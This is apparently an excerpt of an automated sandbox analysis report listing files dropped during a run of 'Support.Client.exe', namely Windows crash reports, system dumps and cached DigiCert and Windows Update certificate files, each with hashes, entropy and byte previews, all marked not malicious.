                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.3.4.1.6.1.7.8.6.2.6.0.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.3.4.1.6.1.9.3.9.3.8.5.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.8.a.f.f.2.5.-.4.b.1.d.-.4.1.9.0.-.9.9.6.d.-.8.c.3.e.7.a.6.2.d.1.e.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.4.7.5.6.9.2.-.a.5.4.8.-.4.e.1.7.-.a.e.d.5.-.c.a.7.a.b.5.f.9.4.4.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.u.p.p.o.r.t...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.0.-.0.0.0.1.-.0.0.1.4.-.5.2.6.d.-.e.8.3.3.6.7.5.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.7.d.f.d.6.3.8.3.4.0.6.7.1.0.9.0.c.2.c.5.9.5.9.c.0.1.1.b.e.d.b.0.0.0.0.f.f.f.f.!.0.0.0.0.8.d.5.6.0.1.d.e.3.c.f.c.6.7.a.c.a.5.7.4.8.f.5.0.d.d.f.9.f.6.e.6.3.d.e.7.0.8.c.e.!.S.u.p.p.o.r.t...C.l.i.e.n.t...e.x.e.....T.
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Sun Dec 22 11:46:58 2024, 0x1205a4 type
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):84808
                                                                                                                                                                                                                                                Entropy (8bit):1.634399185053814
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:SGjbHhI/ZnVV0HA/N5pktoPS2vnmF99Ti0V:XjThI/N4Eu6mF9vV
                                                                                                                                                                                                                                                MD5:A641B1246C52B8EC23F730E9DA77ED66
                                                                                                                                                                                                                                                SHA1:9C84013FC82ED6DC17BC9948A73CC8B980AE2799
                                                                                                                                                                                                                                                SHA-256:E561ABA898DF85D8BD615986A6CF8CB758182F9F131819276B9BBFDE2948BAB2
                                                                                                                                                                                                                                                SHA-512:2E4342D30710B1B9A44334A83B39AC4A3E8465A134B51776629CFFF4D94A4558D174942BA6BE8BDAE46983AE8204EC608C7CC9BD04612938B20D35C95E320C5F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MDMP..a..... .......2.gg.........................................;..........T.......8...........T............!...).......... ...........................................................................................eJ..............GenuineIntel............T...........0.gg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8346
                                                                                                                                                                                                                                                Entropy (8bit):3.699257685033677
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJVX6/DT6Y9LSUVVgmfjt9prf89bS8sfKXGm:R6lXJF6/DT6YhSUVVgmfjtgSPfK
                                                                                                                                                                                                                                                MD5:047161AB7B64550148F728007C69B049
                                                                                                                                                                                                                                                SHA1:FC2E09CA39038219BACD29BFC8CB0597C3BA49DB
                                                                                                                                                                                                                                                SHA-256:B3B7F61010B1125EDBF8B000DACA1076663E9CBB194DDA6E1336C15D2027E4EA
                                                                                                                                                                                                                                                SHA-512:DD44D8EC0FC04E78A35F9B40E34A2645B42608D24D502DF6608DFAC91F202BFE5808E7B6B184D6AC803A56D7C0196E398737B36F63DA0BEFB811CC8B849933EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.6.8.<./.P.i.
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4613
                                                                                                                                                                                                                                                Entropy (8bit):4.4769420513731575
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zs1Jg77aI92hWpW8VYlNYm8M4JRLFM+q8mMztofKd:uIjfPI74w7ViMJsItofKd
                                                                                                                                                                                                                                                MD5:9839650671789563FA82061947F9406D
                                                                                                                                                                                                                                                SHA1:A6E4BDF6D7CC18F2E53A4FBDCAB6DF474B1AD0E5
                                                                                                                                                                                                                                                SHA-256:23E19749D64E0B9556934ECA586426CE9B29A32A4F30909F4D48A432D82AE450
                                                                                                                                                                                                                                                SHA-512:AD0484AD53382051BCABA3F6ABDE4B395AE4416FFC5E8214B04FF51B892A5D9987BD918B8DB4BBA8B16D44E921E8A80DE56348FD1D15A45657F3E8DE1E22A77B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="642409" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):88002
                                                                                                                                                                                                                                                Entropy (8bit):3.0240756555405723
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:pQbVGU4+LZzwe8z8ZzZ8jvEbTPvNDbejw:pQbVGU4+LZzwe8z8ZzZ8jvEbTPvNDbcw
                                                                                                                                                                                                                                                MD5:69D928874CE8DD7F5F43EF457AE18972
                                                                                                                                                                                                                                                SHA1:95EBFE1883EA9CD43D1DF159E36560B661059C22
                                                                                                                                                                                                                                                SHA-256:8376A2708D26E17EA1BA39C4E2EBF749C65ABE424054D4E12083E700C63B2B47
                                                                                                                                                                                                                                                SHA-512:B32361FD213AF9D89C3905BC204B444524C7F03EDEEF19FB63E918044EA3A10A7638A9145CF9DBC21923812E3F02B5016EA025E1F66996454A6D6A0407ABBD2B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                Entropy (8bit):2.6859759327063455
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:TiZYWi2pkeOHYlYxW8dHSeYEZqPtEir4dkCwcUwmapC3MEINICn3:2ZD+yJDTapC3MEISCn3
                                                                                                                                                                                                                                                MD5:552CCF0FB4147FA2EB35B69CA1AB0A5E
                                                                                                                                                                                                                                                SHA1:B2518BC75D92791BD792D461C1D8B932D2A7A5C9
                                                                                                                                                                                                                                                SHA-256:0757D77EE3DD1F7740BF3B09A47FE271C7C71521D3A7466427CF087DD2755375
                                                                                                                                                                                                                                                SHA-512:6A29E673195BF1C3295CFE7ED6B5B3359A8FAA88B48AF3C8B301B81483E8C7DCD6F7F4090A55211EEA9788ED60FB68EB777F75B3574BB5406C551F4030F00983
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):71954
                                                                                                                                                                                                                                                Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1716
                                                                                                                                                                                                                                                Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):727
                                                                                                                                                                                                                                                Entropy (8bit):7.512353515557083
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:5onfZ1hc5RlRtBfQXhB/sHEAoL2FZ1yJ7T9XNSRs0NI81tWaPlsIPZKkQ9lj:5iThcdZIhB/uW2FZ1yVkspgWa93QD
                                                                                                                                                                                                                                                MD5:271780FDF709DBBC7FF8997916DCDBA5
                                                                                                                                                                                                                                                SHA1:F93DF4EE548800E6FBE55452E608474F677CB6DD
                                                                                                                                                                                                                                                SHA-256:24E9B94B4EBB50EC14FBABD460D89B1787325C039E2DF11EB801C91E62A21FD5
                                                                                                                                                                                                                                                SHA-512:F2AF1679152BE6D5793209CD5C07A7C2F6C2D9ED61ADA057594FE547DD2BA4B547C0F7A4A2EFD25E22F31FCB8F6776A53A5CF42E997DA95E030215125CD94243
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241221184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241221184215Z....20241228184215Z0...*.H.............u..3G.N..L ...-...W..h.._1.W..j!....28....gDs......S.v(...P..:w+./.....E.\.D!...".".w1N.&g..zd.e.....>.5.L.>.m..2.e.y...:|...\....._~........J....w..k.....".g_F.9.f.R.....s.``...(fL.eU.pf..f/.J...RO. ~.oyI!....>.....^h..#>.....v...J....m...J.0O.?...eB.Mo....B......1.p.... ...|...}.nW,.+....."....w....C.......^..P.....b..*...l..|5.......5....G.+'#...a.....0D......5.W.q`H.&..`.m.........H[...6...8&..pU.......L$.S...).h.s.....r....^.9a.l[O..3/^{...].@.`...i+..4~8.G...@...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1428
                                                                                                                                                                                                                                                Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):340
                                                                                                                                                                                                                                                Entropy (8bit):3.5401317696123327
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kKVtklK8fNaG7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:rrMN7LkPlE99SCQl2DUeXJlOA
                                                                                                                                                                                                                                                MD5:8901868F4B3F6D637B617B9067B36C9E
                                                                                                                                                                                                                                                SHA1:8C5E16FFA35534EA3FEC1CA456F7367B1A7A2674
                                                                                                                                                                                                                                                SHA-256:C50B625F489468D3D120AB51665D32B05E1169589D2A6EA9109C4B6DC377D33C
                                                                                                                                                                                                                                                SHA-512:101FD92953256C99E12BB8414E690C1FC31A753A3FFBFD440D2D9C6E0572C8E0AA5A3DE8254062EF4A65471B43C3ACEE58D28BADD1BFE12CC4845BB5C13F9A18
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... .........K..wV..(................................................Y.S.T.. ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                Entropy (8bit):3.247897867253902
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kK3U3l99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:fUqDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                MD5:923AB844CA25117E423F82A264E1501B
                                                                                                                                                                                                                                                SHA1:7FC8E48534776847DBAF43B93B243F563D290735
                                                                                                                                                                                                                                                SHA-256:944959EBF2CD6790C3BE0CD08B21E8E0AEF7275D9FED6C21EBD4C2F96D48AE82
                                                                                                                                                                                                                                                SHA-512:7D2C8612C4933C0C87FE065EAB99F53BFDF4E76FA04A146418160C6CC7132AB3144EB859AFF667702EA8595F791834563A440B5C338853F494490B9596723EB4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... .............T..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):308
                                                                                                                                                                                                                                                Entropy (8bit):3.1818604406705786
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kKZR3zNcalgRAOAUSW0P3PeXJUwh8lmi3Y:3CtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                MD5:0DEFF27B805C7520BAF693D5888D2D9A
                                                                                                                                                                                                                                                SHA1:099FFB8396BBD3931ADB2E173DEED2B84C2D1BF6
                                                                                                                                                                                                                                                SHA-256:6A9D3DCF788E5C4BA00C70BE8140FDBCD6C57BA7591231CCDE236BAC554DF180
                                                                                                                                                                                                                                                SHA-512:9010BA3A3434EAB79D309267ECE8EAF665F1422DC508C8C6A0A46DF0CA9018B130C4047470A7AF972D2D856D806CEC33992B01F2140B379E751DC822F56874DD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... ........r%t..U..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):412
                                                                                                                                                                                                                                                Entropy (8bit):3.9835320758881108
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kKguUBrTtrQ3yfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:IusrxmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                MD5:EE49DB23015A5D91395073B19984756D
                                                                                                                                                                                                                                                SHA1:562FE0575446C94EB447E8A2B86A0F906C11B3E4
                                                                                                                                                                                                                                                SHA-256:9E1A149A915D1CE5A32A19C4D110EB7A7D69C1C79CE0200E847D3CE1CD566C5E
                                                                                                                                                                                                                                                SHA-512:811C16F46C4A0F7A7CC09DD355857EF57A1D59EC918CA9D775932D0BBC8ECCC2FFC1DD760DF4A4200AEB16AA09E9D3A71B7EFF06AF3D62FA57016100C97C0877
                                                                                                                                                                                                                                                Malicious:false
